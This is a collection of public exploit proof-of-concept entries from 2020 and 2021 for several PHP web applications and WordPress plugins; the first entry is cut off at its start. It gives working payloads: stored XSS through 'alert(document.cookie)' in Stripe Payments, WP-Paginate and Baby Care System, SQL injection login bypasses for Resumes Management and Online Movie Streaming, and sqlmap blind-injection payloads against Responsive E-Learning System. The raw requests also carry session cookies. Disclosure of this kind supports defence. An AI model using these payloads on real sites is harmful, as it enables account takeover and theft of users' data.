wordpress_5b1d7751a3da8a97505638936b7963ae=root%7C1609074082%7C6vGILxkmE1tZmBRmymy2iwNfvpGntlQfhEhwVLDGHFu%7C50b0c8ba4dcc6dfdd756418c9fc960d3736f93a0febf165408110ea815dbab03; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5b1d7751a3da8a97505638936b7963ae=root%7C1609074082%7C6vGILxkmE1tZmBRmymy2iwNfvpGntlQfhEhwVLDGHFu%7Cb3e517e751d2519dc5473f911230fe31c966c9c755f193344b4bdea80a09d8b4; asp_transient_id=36985e31f4be2b5ae0e14586c592c87d; wp-settings-1=mfold%3Do%26editor%3Dhtml%26posts_list_mode%3Dlist; wp-settings-time-1=1608903490 Connection: close wp-asp-urlHash=general&option_page=AcceptStripePayments-settings-group&action=update&_wpnonce=eee296fed3&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dasp-products%26page%3Dstripe-payments-settings&AcceptStripePayments-settings%5Bcheckout_url%5D=http%3A%2F%2F192.168.31.131%2Fstripe-checkout-result%2F&asp_products_page_url_value=http%3A%2F%2F192.168.31.131%2Fproducts%2F& *AcceptStripePayments-settings%5Bcurrency_code%5D=USDjk9v0%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3edr45t* &AcceptStripePayments-settings%5Bcurrency_symbol%5D=%24&AcceptStripePayments-settings%5Bbutton_text%5D=Buy+Now&AcceptStripePayments-settings%5Bpopup_button_text%5D=Pay+%25s&AcceptStripePayments-settings%5Bcheckout_lang%5D=&AcceptStripePayments-settings%5Bpopup_default_country%5D=0&AcceptStripePayments-settings%5Bapi_publishable_key%5D=1&AcceptStripePayments-settings%5Bapi_secret_key%5D=2&AcceptStripePayments-settings%5Bapi_publishable_key_test%5D=3&AcceptStripePayments-settings%5Bapi_secret_key_test%5D=4&AcceptStripePayments-settings%5Bbuyer_email_type%5D=text&AcceptStripePayments-settings%5Bfrom_email_address%5D=test+%3Csales% 40your-domain.com %3E&AcceptStripePayments-settings%5Bbuyer_email_subject%5D=Thank+you+for+the+purchase&AcceptStripePayments-settings%5Bbuyer_email_body%5D=Hello%0D%0A%0D%0AThank+you+for+your+purchase%21+You+ordered+the+following+item%28s%29%3A%0D%0A%0D%0A%7Bproduct_details%7D&AcceptStripePayments-settings%5Bseller_notification_email%5D=localhost% 40google.com <http://40naver.com/> &AcceptStripePayments-settings%5Bseller_email_type%5D=text&AcceptStripePayments-settings%5Bseller_email_subject%5D=Notification+of+product+sale&AcceptStripePayments-settings%5Bseller_email_body%5D=Dear+Seller%0D%0A%0D%0AThis+mail+is+to+notify+you+of+a+product+sale.%0D%0A%0D%0A%7Bproduct_details%7D%0D%0A%0D%0AThe+sale+was+made+to+%7Bpayer_email%7D%0D%0A%0D%0AThanks&AcceptStripePayments-settings%5Bsend_email_on_error_to%5D=localhost% 40google.com <http://40naver.com/> &AcceptStripePayments-settings%5Bprice_currency_pos%5D=left&AcceptStripePayments-settings%5Bprice_decimal_sep%5D=.&AcceptStripePayments-settings%5Bprice_thousand_sep%5D=%2C&AcceptStripePayments-settings%5Bprice_decimals_num%5D=2&AcceptStripePayments-settings%5Bcustom_field_name%5D=&AcceptStripePayments-settings%5Bcustom_field_descr%5D=&AcceptStripePayments-settings%5Bcustom_field_descr_location%5D=placeholder&AcceptStripePayments-settings%5Bcustom_field_position%5D=above&AcceptStripePayments-settings%5Bcustom_field_type%5D=text&AcceptStripePayments-settings%5Bcustom_field_validation%5D=&AcceptStripePayments-settings%5Bcustom_field_custom_validation_regex%5D=&AcceptStripePayments-settings%5Bcustom_field_custom_validation_err_msg%5D=Please+enter+valid+data&AcceptStripePayments-settings%5Btos_text%5D=I+accept+the+%3Ca+href%3D%22https%3A%2F%2Fexample.com%2Fterms-and-conditions%2F%22+target%3D%22_blank%22%3ETerms+and+Conditions%3C%2Fa%3E&AcceptStripePayments-settings%5Btos_position%5D=above&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BUSD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BEUR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BGBP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BAUD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BARS%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBAM%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBGN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBRL%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCAD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCLP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCNY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCOP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCZK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BDKK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BEGP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BHKD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BHUF%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BINR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BIDR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BILS%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BJPY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BLBP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BMYR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BMXN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BNZD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BNOK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPEN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPHP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPLN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BRON%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BRUB%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSAR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSGD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BZAR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BKRW%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSEK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCHF%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTWD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTHB%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTRY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BUYU%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BVND%5D=1&AcceptStripePayments-settings%5Bpp_additional_css%5D=&AcceptStripePayments-settings%5Brecaptcha_site_key%5D=&AcceptStripePayments-settings%5Brecaptcha_secret_key%5D=&submit=Save+Changes

# Exploit Title: Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection) # Date: 2020-12-27 # Exploit Author: Kshitiz Raj (manitorpotterk) # Vendor Homepage: http://egavilanmedia.com # Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/ # Version: 1.0 # Tested on: Windows 10/Kali Linux Step 1 - Go to url http://localhost/Resumes/login.html Step 2 - Enter Username :- ' or '1'='1'# Step 3 - Enter Password - anything

# Exploit Title: WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS # Date: 04-01-2021 # Software Link: https://wordpress.org/plugins/wp-paginate/ # Exploit Author: Park Won Seok # Contact: [email protected] # Category: Webapps # Version: WP-Paginate(Ver-2.1.3) # CVE : N/A # Tested on: Windows 10 x64 # description: # A Stored Cross-site scripting (XSS) was discovered in wordpress plugins WP-Paginate(Ver_2.1.3) # Vulnerability parameters : 2nd parameter "preset" have Stored-XSS. # POC - Stored-XSS POST /wp-admin/options-general.php?page=wp-paginate.php HTTP/1.1 Host: localhost Content-Length: 348 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/wp-admin/options-general.php?page=wp-paginate.php Accept-Encoding: gzip, deflate Accept-Language: ko,en-US;q=0.9,en;q=0.8 Cookie: wordpress_5b1d7751a3da8a97505638936b7963ae=root%7C1609175102%7CsmSXDMcLQrRT6VE8KfGkKmVhXgpnCEAYtWIzvd91r78%7C94877ae306a5c59f9cdb81adc60a8cd6ad84e0e7551b18042ee0a33c9ab5cb31; wordpress_test_cookie=WP%20Cookie%20check; asp_transient_id=36985e31f4be2b5ae0e14586c592c87d; wp-settings-1=mfold%3Do%26editor%3Dhtml%26posts_list_mode%3Dlist%26unfold%3D1; wp-settings-time-1=1609001802; wordpress_logged_in_5b1d7751a3da8a97505638936b7963ae=root%7C1609175102%7CsmSXDMcLQrRT6VE8KfGkKmVhXgpnCEAYtWIzvd91r78%7Cd570540f18447db0f0859be9e8e14bab64da22c8cf50fb8a80ebea73f188cb48 Connection: close _wpnonce=8441c7c7b9&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-paginate.php&title=Pages%3A&previouspage=%26laquo%3B&nextpage=%26raquo%3B&position=none&font=font-inherit&preset=default& *preset='%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3e* &before=%3Cdiv+class%3D%22navigation%22%3E&after=%3C%2Fdiv%3E&empty=on&css=on&range=3&anchor=1&gap=3&wp_paginate_save=Save+Changes

# Exploit Title: Online Movie Streaming 1.0 - Authentication Bypass # Date: 2020-12-27 # Exploit Author: Kshitiz Raj (manitorpotterk) # Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code # Version: 1.0 # Tested on: Windows 10/Kali Linux Step 1 - Go to url http://localhost/onlinemovie/user-login.php Step 2 – Enter Username :- [email protected] Step 3 - Enter Password - ' or '1'='1'#

# Exploit Title: Responsive E-Learning System 1.0 – 'id' Sql Injection # Date: 2020-12-24 # Exploit Author: Kshitiz Raj(manitorpotterk) # Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows 10/Kali Linux The 'id=' parameter in Responsive E-Learning System is vulnerable to Sql Injection. *Vulnerable Url : *http://localhost/elearning/delete_teacher_students.php?id=17 -p <http://localhost/elearning/delete_teacher_students.php?id=17%0D-p> id # sqlmap -u http://192.168.127.1//elearning/delete_teacher_students.php?id=17 -p id ___ __H__ ___ ___["]_____ ___ ___ {1.3.11#stable} |_ -| . [.] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 08:59:01 /2020-12-24/ 08:59:33] [INFO] checking if the injection point on GET parameter 'id' is a false positive GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y sqlmap identified the following injection point(s) with a total of 402 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=17' RLIKE (SELECT (CASE WHEN (7532=7532) THEN 17 ELSE 0x28 END))-- YDSn Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=17' AND (SELECT 4939 FROM (SELECT(SLEEP(5)))EQuU)-- RaGm --- [08:59:38] [INFO] the back-end DBMS is MySQL web application technology: PHP 7.2.34, Apache 2.4.46 back-end DBMS: MySQL >= 5.0.12

# Exploit Title: Baby Care System 1.0 - 'Post title' Stored XSS # Exploit Author: Hardik Solanki # Vendor Homepage: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14622&title=Baby+Care+System+in+PHP%2FMySQLi+with+Full+Source+Code+ # Version: 1 # Tested on Windows Vulnerable Parameters: Edit Page tab Steps to reproduce: 1: Log in with a valid username and password. Navigate to the "Post" tab on the left-hand side. 2: Add the new post and then add the payload "<audio src/onerror=alert(document.cookie)>" in "Post title" parameter and click on save button. Post Saved successfully. 3: Now, XSS will get stored and trigger every time and the attacker can steal authenticated users' cookies.